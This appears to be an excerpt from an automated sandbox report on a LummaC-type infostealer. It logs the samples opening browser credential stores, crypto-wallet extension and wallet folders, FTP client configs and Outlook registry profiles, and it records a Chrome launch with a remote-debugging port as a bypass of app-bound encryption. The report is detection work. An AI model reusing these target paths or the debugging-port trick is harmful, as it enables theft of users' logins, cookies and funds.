Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN

Source: Yara match	File source: 00000001.00000002.2150281200.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: random.exe PID: 6864, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: K1T78D2510W1E77KV3WDUQ9M.exe PID: 3428, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: random.exe PID: 6864, type: MEMORYSTR
Source: Yara match	File source: 19.2.GWZ8arC.exe.3999550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.GWZ8arC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.GWZ8arC.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2759274946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2751195208.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1689374040.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

